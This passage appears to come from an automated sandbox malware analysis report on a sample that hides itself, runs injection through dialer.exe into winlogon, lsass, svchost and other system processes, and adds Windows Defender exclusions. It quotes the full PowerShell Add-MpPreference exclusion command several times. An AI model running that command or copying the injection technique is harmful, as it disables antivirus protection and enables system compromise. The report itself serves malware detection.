          Source: dwm.exe, 00000029.00000002.3298424961.0000011607ED0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
          Source: C:\Windows\System32\dialer.exeAPI call chain: ExitProcess graph end nodegraph_25-413
          Source: C:\Windows\System32\dialer.exeAPI call chain: ExitProcess graph end nodegraph_62-477
          Source: C:\Windows\System32\dialer.exeAPI call chain: ExitProcess graph end nodegraph_65-91
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\System32\winlogon.exeCode function: 31_2_000001E858987D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_000001E858987D90
          Source: C:\Windows\System32\dialer.exeCode function: 65_2_00000001408460F0 LoadLibraryA,GetProcAddressForCaller,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,65_2_00000001408460F0
          Source: C:\Windows\System32\dialer.exeCode function: 25_2_00000001400017EC GetProcessHeap,HeapAlloc,OpenProcess,TerminateProcess,CloseHandle,GetProcessHeap,HeapFree,25_2_00000001400017EC
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\dialer.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\dialer.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\nW2oopMIdg.exeCode function: 0_2_00007FF7EB90118B Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,0_2_00007FF7EB90118B
          Source: C:\Users\user\Desktop\nW2oopMIdg.exeCode function: 0_2_00007FF7EB9011D8 _initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,0_2_00007FF7EB9011D8
          Source: C:\Windows\System32\winlogon.exeCode function: 31_2_000001E858987D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_000001E858987D90
          Source: C:\Windows\System32\winlogon.exeCode function: 31_2_000001E85898D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_000001E85898D2A4
          Source: C:\ProgramData\Screenshots\Lightshot.exeCode function: 36_2_00007FF7B1C8118B Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,36_2_00007FF7B1C8118B
          Source: C:\ProgramData\Screenshots\Lightshot.exeCode function: 36_2_00007FF7B1C811D8 _initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,36_2_00007FF7B1C811D8
          Source: C:\Windows\System32\lsass.exeCode function: 39_2_00000140AE867D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,39_2_00000140AE867D90
          Source: C:\Windows\System32\lsass.exeCode function: 39_2_00000140AE86D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,39_2_00000140AE86D2A4
          Source: C:\Windows\System32\svchost.exeCode function: 40_2_00000195DD5CD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,40_2_00000195DD5CD2A4
          Source: C:\Windows\System32\svchost.exeCode function: 40_2_00000195DD5C7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,40_2_00000195DD5C7D90
          Source: C:\Windows\System32\dwm.exeCode function: 41_2_000001160CA4D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,41_2_000001160CA4D2A4
          Source: C:\Windows\System32\dwm.exeCode function: 41_2_000001160CA47D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,41_2_000001160CA47D90
          Source: C:\Windows\System32\dialer.exeCode function: 64_2_0000000140001160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,64_2_0000000140001160
          Source: C:\Windows\System32\svchost.exeCode function: 66_2_00000257E10AD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,66_2_00000257E10AD2A4
          Source: C:\Windows\System32\svchost.exeCode function: 66_2_00000257E10A7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,66_2_00000257E10A7D90
          Source: C:\Windows\System32\svchost.exeCode function: 67_2_000001F28C937D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,67_2_000001F28C937D90
          Source: C:\Windows\System32\svchost.exeCode function: 67_2_000001F28C93D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,67_2_000001F28C93D2A4
          Source: C:\Windows\System32\svchost.exeCode function: 68_2_000001CA9854D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,68_2_000001CA9854D2A4
          Source: C:\Windows\System32\svchost.exeCode function: 68_2_000001CA98547D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,68_2_000001CA98547D90
          Source: C:\Windows\System32\svchost.exeCode function: 69_2_000001D265317D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,69_2_000001D265317D90
          Source: C:\Windows\System32\svchost.exeCode function: 69_2_000001D26531D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,69_2_000001D26531D2A4

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Adds a directory exclusion to Windows Defender
          Source: C:\Users\user\Desktop\nW2oopMIdg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          Source: C:\Users\user\Desktop\nW2oopMIdg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
          Source: C:\ProgramData\Screenshots\Lightshot.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
          Allocates memory in foreign processes
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\winlogon.exe base: 1E858950000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\lsass.exe base: 140ADFC0000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 195DD590000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dwm.exe base: 1160C9E0000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\winlogon.exe base: 1E8589B0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\lsass.exe base: 140AE890000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 195DE1A0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dwm.exe base: 1160CA10000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 257E1070000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1F28C1D0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1CA97FD0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D2652E0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 254A27A0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 24B87DA0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 205FB3C0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1A205670000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 18EC1F30000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 25CE3BC0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 26238950000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2786E560000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1611FF70000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 27C0F350000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1B279570000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1E70A460000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 22D13110000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 22C8C580000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2825F1D0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2AA5D9C0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20BAEC90000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D2DC1B0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1C782530000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\spoolsv.exe base: A60000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 24066EB0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1A3FD9A0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 181CEDB0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2A142790000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 195B6F30000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1428DC90000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1B973730000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1DBFA540000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D76CCC0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1A239D90000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 17CFA390000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 23FB7270000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1DF53B50000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 164E88A0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 25177B50000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 28D5D340000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\sihost.exe base: 24EB5E10000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20859990000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1F153C20000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D241D40000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 16FADAD0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: 20E03070000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 15204DB0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\explorer.exe base: 3340000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 175C5280000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dasHost.exe base: 1CE76AA0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 22EF1B30000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1C7F34F0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 261DE4D0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 22E74520000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 1B1A9D00000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 217AF8C0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 226D8930000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 13E5E930000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F844140000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 21197E30000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 223DC870000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 1B4698D0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 27234C50000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 28543540000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\audiodg.exe base: 2B684340000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1BE58920000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 228CA7E0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 228B3E20000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1EDA6AC0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 15519600000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 185BB560000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 17F327F0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 197F36A0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 1C019C80000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 1C01A710000 protect: page execute and read and write
          Contains functionality to inject code into remote processes
          Source: C:\Windows\System32\dialer.exeCode function: 25_2_0000000140001C88 CreateProcessW,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,OpenProcess,TerminateProcess,25_2_0000000140001C88
          Creates a thread in another existing process (thread injection)
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\winlogon.exe EIP: 5895273CJump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\lsass.exe EIP: ADFC273CJump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: DD59273CJump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 589B273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: AE89273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: DE1A273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: CA1273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: E107273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 8C1D273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 97FD273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 652E273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A27A273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 87DA273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FB3C273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 567273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C1F3273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: E3BC273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 3895273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6E56273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1FF7273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F35273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7957273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A46273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1311273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8C58273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5F1D273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5D9C273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: AEC9273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: DC1B273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8253273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A6273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 66EB273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FD9A273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: CEDB273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4279273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: B6F3273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8DC9273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7373273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FA54273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6CCC273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 39D9273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FA39273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: B727273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 53B5273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: E88A273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 77B5273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5D34273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: B5E1273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5999273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 53C2273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 41D4273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: ADAD273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 307273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4DB273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 334273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C528273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 76AA273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F1B3273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F34F273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: DE4D273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7452273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A9D0273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: AF8C273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D893273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5E93273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4414273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 97E3273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: DC87273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 698D273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 34C5273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4354273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8434273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5892273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: CA7E273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: B3E2273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A6AC273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1960273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: BB56273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 327F273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F36A273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 19C8273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1A71273C
          Injects a PE file into a foreign processes
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 1E858950000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 140ADFC0000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 195DD590000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 1160C9E0000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 1E8589B0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 140AE890000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 195DE1A0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 1160CA10000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 257E1070000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F28C1D0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1CA97FD0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2652E0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 254A27A0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 24B87DA0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 205FB3C0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A205670000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 18EC1F30000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 25CE3BC0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26238950000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2786E560000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1611FF70000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 27C0F350000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B279570000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E70A460000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22D13110000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22C8C580000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2825F1D0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2AA5D9C0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20BAEC90000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2DC1B0000 value starts with: 4D5A
